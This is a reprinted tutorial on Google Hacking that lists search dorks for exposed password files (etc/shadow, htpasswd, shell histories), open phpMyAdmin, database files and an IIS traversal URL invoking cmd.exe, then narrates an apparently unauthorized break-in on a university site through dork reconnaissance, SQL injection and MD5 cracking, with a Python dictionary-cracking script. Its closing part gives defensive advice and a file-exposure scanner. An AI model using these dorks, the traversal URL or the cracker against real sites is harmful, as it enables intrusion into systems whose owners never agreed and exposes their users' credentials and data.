This article is reprinted from the web.
------------------------------------
Google Hacking is nothing new; I saw introductions to it on foreign sites years ago. I paid it little attention at the time, thinking it was good for nothing more than finding an unrenamed .mdb or a webshell somebody else had left behind. Some time ago, after reading up on it properly, I realized that Google Hacking is not so simple...
[Section 1]
Simple implementation of Google Hacking
I once read an article that simply searched www.google.com for dvbbs6.mdb or conn.inc. In fact Google's query syntax can give us far more information (and, of course, gives just as much to people who attack for a living). The common operators are described below.
intext:
Searches for a string in the body of a web page. For example, entering intext:Net in Google returns every page whose body contains "Net". allintext: works the same way but applies to all of the words that follow it.
intitle:
Like intext:, but the string must appear in the page title. Searching intitle:"Security Angel" returns every page whose title contains "Security Angel" (without the quotes only "Security" is bound to intitle:, and "angel" becomes an ordinary search word). allintitle: applies to all of the words that follow it.
cache:
Shows Google's cached copy of a page. A cached copy can reveal content that has since been removed from or changed on the live site.
define:
Looks up the definition of a word. define:hacker returns definitions of "hacker".
filetype:
Returns only files of the given type. filetype:doc returns URLs ending in .doc. Searching for .bak, .mdb or .inc is just as easy and tends to turn up far more interesting material. This operator is worth using whenever you are collecting information about a specific target, whether for a web attack or for the test described later.
info:
Shows Google's basic information about a given site.
inurl:
Matches the given string anywhere in the URL. For example, inurl:admin returns many links whose URL contains "admin".
link:
Returns pages that link to the given URL. For example, link:www.4ngel.net returns the pages that link to www.4ngel.net.
site:
Also very useful: site:www.4ngel.net restricts results to URLs under that host (site:4ngel.net covers the whole domain and its subdomains).
Some other operators are also useful:
+ forces Google to include a word it would otherwise drop as a stop word
- excludes a word
~ also matches synonyms of the word
* wildcard standing in for one or more whole words (not for part of a word; Google does not offer a single-character wildcard, and a lone "." is ignored as punctuation)
"" exact phrase
Let's move on to practical use (I prefer Google.com, and everything below was searched there). An attacker eager to test a site is probably most interested in password files, and Google's search power frequently exposes such sensitive information. Try searching Google for:
intitle:"index of" etc
intitle:"index of" .sh_history
intitle:"index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
Important password files are sometimes left on the web unprotected for all sorts of reasons, and in the wrong hands the damage is serious. The following is a passwd file from a FreeBSD system (which I have already redacted):
Google can also find sites running programs with known vulnerabilities. For example, when a source code disclosure vulnerability was found in Zeroboard some time ago, the sites using it could be located with:
intext:zeroboard filetype:php
or with:
inurl:outlogin.php?_zb_path= site:.jp
phpMyAdmin is a powerful database administration tool, and on some misconfigured sites it can be used without any password. Google finds such installations with:
intitle:phpMyAdmin intext:"create new database"
Remember http://www.xxx.com/_vti_bin/..%5C..%5C..%5C..%5C..%5C../winnt/system32/cmd.exe?/c+dir ? Google still turns up plenty of antique machines of that kind, and the same approach finds pages with other CGI vulnerabilities:
allinurl:winnt system32
As mentioned earlier, Google can find database files, and a few query combinations locate them and related material (Access databases, MSSQL and MySQL connection files, and so on) quite precisely. For example:
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data // common on misconfigured Apache + Win32 servers
By the same principle Google can also locate admin backends; the method is just a few more words. After all, the purpose of this article is to make Google Hacking known, not to have you wreck sites with it. Security is a double-edged sword; what matters is how you use it.
[Section 2]
Google can be used both to collect information about a site and to penetrate it. Next we use Google to test a specific site. www.xxxx.com belongs to a well-known Chinese university; I decided on a whim to test it (all information identifying the school has been processed, so don't go looking for it :).
First, use Google for some basic information about the site (some details omitted):
site:xxxx.com
The results reveal the domain names of several departments:
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
A quick ping suggests they sit on different servers (compared with the one poor web server at my own school, this university is rich). Schools usually hold a lot of good documents, so let's see what is there:
site:xxxx.com filetype:doc
That yields N good .doc files. Next, look for the admin backend addresses:
site:xxxx.com intext:management
site:xxxx.com inurl:login
site:xxxx.com intitle:management
More than two admin backend addresses come back, among them:
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp
Not bad. Now let's see what programs run on each server:
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:......
......
The A2 server runs IIS with ASP and also hosts a PHP forum.
The A3 server is also IIS, with ASPX and ASP; the web applications look home-grown. Since there is a forum, check whether anyone has posted a public FTP account or the like:
site:a2.xxxx.com intext:ftp://*:*
Nothing of value. Are there any upload pages?
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
A file upload page turns up on A2:
http://a2.xxxx.com/sys/uploadfile.asp
Opening it in IE gives "access denied", so try injection instead:
site:a2.xxxx.com filetype:asp
That gives the addresses of N ASP pages; let a tool do the grunt work. The application clearly does nothing to prevent injection. The dbowner permission is not high, but it is enough. I don't much like getting a shell by backing up the database, and the database looked large anyway, so I simply read the web administrator's password out directly. It is stored as an MD5 hash. Passwords on school sites are usually fairly regular, typically a variation on the domain name plus a phone number, and Google can help here:
site:xxxx.com // yields N second-level domain names
site:xxxx.com intext:*@xxxx.com // yields N e-mail addresses and their owners' names
site:xxxx.com intext:"phone number" // N phone numbers
Build a dictionary from that information and let it run. After a while four accounts had cracked: two from the student union, one administrator, and one that looked like a teacher's. Log in:
Name: website administrator
Pass: a2xxxx7619 // as I said: domain name + four digits
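What the dictionary step above amounts to, shown as an added example rather than the author's own tool: harvested host names, mailbox names and phone numbers become base words, each base word is extended with a four-digit suffix, and every candidate is MD5-hashed and compared with the stolen hash. The harvested values below are constructed stand-ins for what the site: and intext: queries return; the target hash is computed inside the block from the page's redacted password a2xxxx7619, not taken from any real system.

```python
"""Why "domain name + four digits" falls in seconds against an unsalted
MD5 hash. Added example, not from the article; the harvest is made up."""
import hashlib
import re

# Constructed harvest: what site:xxxx.com and intext:*@xxxx.com might return.
SUBDOMAINS = ["a1", "a2", "a3", "a4"]
DOMAIN = "xxxx"
PHONES = ["010-12345678", "010-87654321"]
MAILBOXES = ["webmaster@xxxx.com", "zhang.wei@xxxx.com"]


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def tokens_from_harvest() -> list:
    """Base words an admin is likely to reuse: hosts, mailbox names, phone stubs."""
    base = set(SUBDOMAINS) | {DOMAIN} | {f"{s}{DOMAIN}" for s in SUBDOMAINS}
    base |= {m.split("@")[0].replace(".", "") for m in MAILBOXES}
    for p in PHONES:
        digits = re.sub(r"\D", "", p)
        base.add(digits)
        base.add(digits[-4:])  # the last four digits are the usual suffix
    return sorted(base)


def candidates(words):
    """Yield word, word + each phone tail, and word + every NNNN suffix."""
    phone_tails = {re.sub(r"\D", "", p)[-4:] for p in PHONES}
    for w in words:
        yield w
        for tail in sorted(phone_tails):
            yield w + tail
        for n in range(10000):
            yield f"{w}{n:04d}"


def count_candidates(words) -> int:
    return sum(1 for _ in candidates(words))


def crack_md5(target_hex: str, words):
    """Return the first candidate whose MD5 equals target_hex, else None."""
    target = target_hex.lower()
    for pw in candidates(words):
        if md5_hex(pw) == target:
            return pw
    return None


if __name__ == "__main__":
    words = tokens_from_harvest()
    target = md5_hex("a2xxxx7619")  # the page's redacted password, hashed here
    print(f"{len(words)} base words, {count_candidates(words)} candidates")
    print("recovered:", crack_md5(target, words))
```

Fifteen base words already give roughly 150,000 candidates, which is nothing for MD5; salting would not change the count, but a password that is not derived from public facts about the site would put it out of reach of this dictionary entirely.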
Privilege escalation from here is outside the scope of this article.
Preventing Google Hacking:
See the earlier article: http://www.4ngel.net/article/26.htm.
I don't personally recommend that method, though; it rather gives the game away (like the proverbial sign reading "no silver buried here"). A simpler approach is to ask Google to remove the pages from its index through this URL:
http://www.google.com/remove.html
A few days ago I saw a discussion of using a script to fool the crawler, which is also worth trying:
The code is as follows (the original matched "googlebot" case-sensitively, which never matches Googlebot's real User-Agent string "Mozilla/5.0 (compatible; Googlebot/2.1; ...)"; the versions below compare case-insensitively and stop processing after the redirect):
PHP:
<?php
// Send Google's crawler elsewhere instead of serving the real page.
// Anyone can send this User-Agent, so this hides pages from the index
// but is not access control.
if (stristr($_SERVER['HTTP_USER_AGENT'], "googlebot") !== false) {
    header("HTTP/1.1 301 Moved Permanently");
    header("Location: http://www.google.com/");
    exit;
}
?>
ASP:
<%
' InStr compares case-sensitively by default; vbTextCompare makes it case-insensitive.
If InStr(1, Request.ServerVariables("HTTP_USER_AGENT"), "googlebot", vbTextCompare) > 0 Then
    Response.Redirect "http://www.google.com/"
End If
%>
Two caveats: serving the crawler something different from what users see is cloaking, which Google may penalise by dropping the site from its index, and the check does nothing against a person who simply browses to the page. Keeping sensitive files out of the document root, or behind authentication, is the only fix that holds.
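Rather than fooling the crawler, the more reliable fix is to make sure the material the dorks look for is not on the site at all. The following added example (not from the article) walks a web document root and reports directories that Apache would autoindex because they contain no index file, plus files whose names or extensions the intitle:"index of" and filetype: queries above target. The sample tree it creates in a temporary directory is constructed, and the lists of index-file names and risky extensions are assumptions to adjust per site.

```python
"""Find on disk what the dorks would find through Google.

Added example, not from the article. Walks a document root and reports
autoindexed directories and files with sensitive names or extensions.
"""
import os
import shutil
import tempfile
from pathlib import Path

# Assumed lists; extend them to match the server and applications in use.
INDEX_FILES = {"index.html", "index.htm", "index.php", "index.asp", "default.asp"}
RISKY_EXTENSIONS = {".mdb", ".inc", ".bak", ".old", ".sql", ".pwd", ".db"}
RISKY_NAMES = {".sh_history", ".bash_history", "passwd", "master.passwd",
               "htpasswd", ".htpasswd", "spwd.db", "pwd.db", "shadow", "service.pwd"}


def find_exposures(webroot) -> list:
    """Return sorted (kind, relative_path) pairs for every problem found."""
    root = Path(webroot)
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        d = Path(dirpath)
        rel_dir = d.relative_to(root).as_posix()
        # Without an index file Apache's autoindex produces the "Index of" page.
        if not {f.lower() for f in filenames} & INDEX_FILES:
            findings.append(("autoindex", rel_dir))
        for f in filenames:
            lf = f.lower()
            rel = (d / f).relative_to(root).as_posix()
            if lf in RISKY_NAMES:
                findings.append(("sensitive-name", rel))
            elif Path(lf).suffix in RISKY_EXTENSIONS:
                findings.append(("sensitive-ext", rel))
    return sorted(findings)


def build_sample_webroot() -> Path:
    """Construct a small tree resembling a misconfigured Apache + Win32 site."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "index.html").write_text("<html>home</html>")
    (root / "data").mkdir()                       # no index file: autoindexed
    (root / "data" / "bbs.mdb").write_bytes(b"\x00")
    (root / "inc").mkdir()
    (root / "inc" / "conn.inc").write_text('<% dbpath = "data/bbs.mdb" %>')
    (root / "inc" / "index.html").write_text("")  # index present, but .inc is still readable
    (root / "etc").mkdir()                        # no index file: autoindexed
    (root / "etc" / "passwd").write_text("root:*:0:0::/root:/bin/sh\n")
    return root


def sample_findings() -> list:
    """Run the check over the constructed tree and remove the tree afterwards."""
    root = build_sample_webroot()
    try:
        return find_exposures(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for kind, path in sample_findings():
        print(f"{kind:15} {path}")
```

Autoindex findings are fixed with Options -Indexes in the Apache configuration (or an index file in the directory); database and include files belong outside the document root, where no URL maps to them. Listing the same paths in robots.txt instead merely documents them for anyone who reads it, which is exactly the objection raised above.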
Postscript
Lately I have been looking at some Google hacking research sites outside China. In the end it almost all comes down to flexible use of a few basic operators, sometimes combined with a script vulnerability; how far it goes depends on the individual. Defences against Google hacking are still few even abroad, so there is plenty left to work out. Administrators running Apache on Windows in particular should pay attention to this: a single intitle:"index of" query brings almost everything out :)